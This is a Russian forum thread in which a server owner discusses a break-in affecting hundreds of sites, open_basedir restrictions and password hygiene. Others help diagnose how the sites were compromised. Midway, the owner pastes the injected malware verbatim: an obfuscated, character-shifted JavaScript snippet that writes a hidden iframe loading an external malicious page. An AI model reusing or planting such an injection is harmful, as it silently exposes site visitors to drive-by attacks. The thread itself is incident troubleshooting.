Использование фото и файлов с другого аккаунта на одном сервере

VAD

Новичок
Использование фото и файлов с другого аккаунта на одном сервере

Есть центральный портал и около 50 сайтов которые работают от одной базы и фото подкачивают с центального сайта с папки /photos/ также подкачивают пару файлов с настройками подкючения к базе. Все это находится на одном сервере и благополучно работало долгие годы. Но сервак был взломан и админ настоятельно рекомендовал усилить защиту ПХП и сделали следующее:

1. enabled safe mode
2. installed mod_security
3. enabled openbasedir protection.
4. disabled certain PHP functions.

Я так понимаю вся моя беда в openbasedir, как я могу реализовать свою задачу при включенном openbasedir?
Сервер мой т.е. админы делают то что я скажу. Насколько это не безопасно отключить openbasedir?

Буду очень благодарен за помощь

-~{}~ 22.10.08 05:52:

Самому приходит в голову такое решение проблемы:
сказать админам чтобы сделали доступ через open_basedir только к одному аккаунту /home/portal/www/
Может у кого-то еще какие-то идеи будут

VAD

Новичок
Автор оригинала: zerkms
ты знаешь как взломали?
Нет не знаю, админы говорят что через форумы или wordpress
примонтировать фотос в нужную директорию в пределах бейсдира
Этот вариант я оставлю на крайний случай т.к. много кода придется править

-~{}~ 22.10.08 15:18:

Автор оригинала: *****
Офигеть какой замечательный админ.
я не админ. я владелец сервера

Фанат

oncle terrible
Команда форума
Ты хочешь сказать, что весь этот зоопарк в пхп ини - твоя собственная инициатива?
Что именно рекомендовал этот "админ"? Так и сказал - "усилить безопасность сервера", и этим его функция исчерпалась?

Фанат

oncle terrible
Команда форума
Меня больше всего удивляет в этой истории то, что он парит мозг не своим "админам", а обращается в спортлото.

VAD, это "админ" - это сотрудник за деньги или знакомый, который по дружбе присматривает?

VAD

Новичок
Автор оригинала: *****
Ты хочешь сказать, что весь этот зоопарк в пхп ини - твоя собственная инициатива?
Что именно рекомендовал этот "админ"? Так и сказал - "усилить безопасность сервера", и этим его функция исчерпалась?
админ сказал:

в последнии дни участились случаи взлома по причине не безопасных скриптов особенно pressword, мы можем улучшить безопасность ПХП сделав следующие настройки

1. We have enabled safe mode
2. We have installed mod_security on your server.
3. We have enabled openbasedir protection.
4. We have disabled certain PHP functions.

Однако это может привести к потере работоспособности многих скриптов. Если хотите мы сделаем это.

Вот так, а я с этим согласился, что ж мне еще оставалось делать. Сейчас я их попросил дать доступ к одному только аккаунту чтобы решить свою проблему, написали что сделают.

А насчет security-аудита я бы не отказался только надо провереных людей чтобы, а то пароли кому зря не хочется раздавать. Можете порекомендовать кого-то

VAD

Новичок
А админ у меня конечно за деньги platinumservermanagement.com
Правда мало берут но работают оперативно а вот о качестве судить трудно

Фанат

oncle terrible
Команда форума
Надо нанять, может быть, пхп программиста, чтобы разобраться, с помощью логов веб-сервера, как именно был произведен взлом.

Но для начала следует выяснить, в чем этот взлом заключался.

VAD

Новичок
В конце каждого хтмл или пхп файла где есть тэг </html> После этого был добавлен такой код:

[script]var source ="=jgsbnf!tsd](iuuq;00qsfwfewtfn234/do0360joefy/qiq(!xjeui]2!ifjhiu]2!gsbnfcpsefs]1?=0jgsbnf?"; var result = "";
for(var i=0;i[source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); [/script]

И так на всех сайтах сервера.

Фанат

oncle terrible
Команда форума
писец.
пароли на фтп смени, владелец заводов, сайтов, пароходов

Lews

Новичок
Что-то помнится такое было, когда на моем компе завелся вирь... Тот по всем хранящимся в ФАРе фтпшникам прошелся, и во все хтмлки на сайте добавил в конец похожие скрипты.

VAD

Новичок
И че все фтп пароли менять у меня более 300 сайтов или только рут?

HraKK

Мудак
Команда форума
на рут, но лучше конечно на все. А то что предложил админ - засунь ему же сам знаешь куда.

dimagolov

Новичок
[offtopic]
VAD, тебя случайно не Еврений Попов учил пользоваться Total Commander-ом как лучшей тулзой для управления сайта?
[/offtopic]

VAD, ломать сайты пользуя дырки в php скриптах много сложнее чем затроянить комп с которого есть прозрачный доступ к ftp.

Сверху